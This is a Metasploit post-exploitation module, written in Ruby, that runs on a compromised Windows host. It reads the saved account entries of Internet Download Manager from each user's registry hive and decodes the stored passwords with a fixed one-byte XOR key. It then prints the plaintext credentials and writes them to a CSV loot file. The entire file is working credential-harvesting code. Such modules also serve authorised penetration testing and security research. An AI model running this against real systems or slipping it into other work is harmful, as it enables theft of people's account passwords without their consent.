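##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Auxiliary::Report

  # Per-user registry path (relative to the user's HKU hive) under which IDM
  # keeps one subkey per site, each holding a 'User' and an 'EncPassword' value.
  IDM_PASSWORDS_KEY = 'Software\\DownloadManager\\Passwords'.freeze

  # Single-byte XOR key applied to every byte of the stored password.
  # This is obfuscation, not encryption: anyone who can read the registry
  # value can recover the plaintext, and so can this module.
  XOR_KEY = 15

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather Internet Download Manager (IDM) Password Extractor',
        'Description' => %q{
          This module recovers the saved premium download account passwords from
          Internet Download Manager (IDM). These passwords are stored in an encoded
          format in the registry. This module traverses through these registry entries
          and decodes them. Thanks to the template code of theLightCosine's CoreFTP
          password module.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'sil3ntdre4m <sil3ntdre4m[at]gmail.com>',
          'Unknown', # SecurityXploded Team, www.SecurityXploded.com
        ],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )
  end

  # Entry point. Walks every user hive visible under HKU, decodes each saved
  # IDM account, and - only when at least one was found - writes the whole set
  # to a single CSV loot file.
  #
  # NOTE: HKU only exposes hives that are currently loaded (typically logged-on
  # users), so accounts saved by logged-off profiles are not covered.
  def run
    creds = Rex::Text::Table.new(
      'Header' => 'Internet Downloader Manager Credentials',
      'Indent' => 1,
      'Columns' => [
        'User',
        'Password',
        'Site'
      ]
    )
    found = 0

    # registry_enumkeys can return nil when the hive cannot be enumerated;
    # Array() turns that into an empty walk instead of a NoMethodError.
    Array(registry_enumkeys('HKU')).each do |k|
      # Keep only real user SIDs and skip the *_Classes hives that share the prefix.
      next unless k.include?('S-1-5-21')
      next if k.include?('_Classes')

      print_status("Looking at Key #{k}")

      begin
        found += extract_user_creds(k, creds)
      rescue StandardError => e
        # Best effort: one broken profile must not abort the remaining ones.
        print_error("An error has occurred: #{e}")
      end
    end

    if found.zero?
      print_status('No IDM credentials found.')
      return
    end

    # Store once, after every hive has been visited. Storing inside the loop
    # would write a new loot file per profile, each repeating the rows of the
    # profiles before it.
    print_status('Storing data...')
    path = store_loot(
      'idm.user.creds',
      'text/csv',
      session,
      creds.to_csv,
      'idm_user_creds.csv',
      'Internet Download Manager User Credentials'
    )
    print_good("IDM user credentials saved in: #{path}")
  end

  # Decodes every saved IDM account under the hive of the given user SID and
  # appends each one as a [user, password, site] row to +creds+.
  #
  # @param sid [String] subkey name under HKU (the user's SID)
  # @param creds [Rex::Text::Table] table that collects the decoded rows
  # @return [Integer] number of rows appended
  def extract_user_creds(sid, creds)
    base = "HKU\\#{sid}\\#{IDM_PASSWORDS_KEY}"
    subkeys = registry_enumkeys("#{base}\\")

    # Empty/missing key covers both "IDM absent" and "IDM present, no saved accounts".
    if subkeys.nil? || subkeys.empty?
      print_status('IDM not installed for this user.')
      return 0
    end

    added = 0
    subkeys.each do |site|
      user = registry_getvaldata("#{base}\\#{site}", 'User')
      epass = registry_getvaldata("#{base}\\#{site}", 'EncPassword')
      next if epass.nil? || epass.empty?

      pass = xor(epass)
      # Plaintext secrets are echoed to the console and later to the loot
      # file on disk; treat both as sensitive output.
      print_good("Site: #{site} (User=#{user}, Password=#{pass})")
      creds << [user, pass, site]
      added += 1
    end
    added
  end

  # XORs every byte of +ciphertext+ with +key+. Because the key is a single
  # fixed byte, encoding and decoding are the same operation.
  #
  # @param ciphertext [String] raw bytes read from the 'EncPassword' value
  # @param key [Integer] byte value to XOR with (defaults to IDM's key)
  # @return [String] decoded bytes
  def xor(ciphertext, key = XOR_KEY)
    ciphertext.unpack('C*').map { |b| b ^ key }.pack('C*')
  end
end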